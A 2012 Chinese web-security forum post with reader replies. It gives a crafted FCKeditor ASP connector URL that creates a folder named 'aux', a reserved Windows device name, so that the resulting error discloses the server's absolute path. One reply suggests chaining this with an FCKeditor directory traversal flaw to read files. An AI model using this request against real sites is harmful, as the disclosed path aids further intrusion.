FCKeditor爆绝对路径

2012-11-19 22:09:19 58 kafeitianshi 5782

代码：FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux

版本未测试。。。

原理：新建个aux文件夹，aux在windows系统不支持，所以会报错，爆出绝对路径，这个比较鸡肋。求大神别喷。。。

类别 Web安全

关于作者

kafeitianshi7篇文章517篇回复

kafeitianshi

评论58次

要评论？请先登录或注册

58楼

suniteboy
2013-2-7 18:47

收藏

回复|@ta|踩(0)|顶(0)
57楼

洪流
2013-2-5 06:58

很不错的思路谢谢分享

回复|@ta|踩(0)|顶(0)
56楼

blackjam
2013-2-3 15:25

不错，收藏以备后用

回复|@ta|踩(0)|顶(0)
55楼

sfsgfr
2013-2-3 09:29

呵呵，不错，值得收藏！

回复|@ta|踩(0)|顶(0)
54楼

藤真
2013-2-2 19:20

这个还是很有作用的，利用这个再配合fck的目录遍历漏洞，可以查看n多东西了！！

回复|@ta|踩(0)|顶(0)
53楼

upload
2013-2-2 00:32

Windows 下不能够以下面这些字样来命名文件/文件夹，包括：“aux”“com1”“com2”“prn”“con”和“nul”等，因为这些名字都属于设备名称，等价于一个 DOS 设备好方法

回复|@ta|踩(0)|顶(0)
52楼

liuda
2013-2-2 00:23

收藏

回复|@ta|踩(0)|顶(0)
51楼

4ngel
2013-1-29 12:36

纯属收藏。。

回复|@ta|踩(0)|顶(0)
50楼

Dd.
2013-1-23 19:25

支持原创，收下了～

回复|@ta|踩(0)|顶(0)
49楼

不是我干的
2013-1-23 19:21

收藏，有时候可用到

回复|@ta|踩(0)|顶(0)
48楼

杀虫剂
2013-1-23 11:23

为了不删号这么老的贴都被楼上2位挖出来了 ^ ^

回复|@ta|踩(0)|顶(0)
47楼

evildns
2013-1-23 11:17

收一了

回复|@ta|踩(0)|顶(0)
46楼

shirly
2013-1-23 11:12

aux，这个亮了。

回复|@ta|踩(0)|顶(0)
45楼

numen
2012-12-26 18:21

找不到路径的时候的好东西

回复|@ta|踩(0)|顶(0)
44楼

pady
2012-12-26 16:35

果断收藏，只能是结合其他洞来用了

回复|@ta|踩(0)|顶(0)
43楼

jelly111
2012-12-26 09:41

上次测试没有通过，不过还是做个记号，下次接着用，

回复|@ta|踩(0)|顶(0)
42楼

snowing
2012-12-26 09:18

收藏了感谢信Z分享

回复|@ta|踩(0)|顶(0)
41楼

darkst
2012-12-25 22:04

还是挺有用的

回复|@ta|踩(0)|顶(0)
40楼

呆子不开口
2012-12-25 21:29

绝对路径有时候很宝贵

回复|@ta|踩(0)|顶(0)
39楼

shirly
2012-12-25 15:53

嗯这个要顶

回复|@ta|踩(0)|顶(0)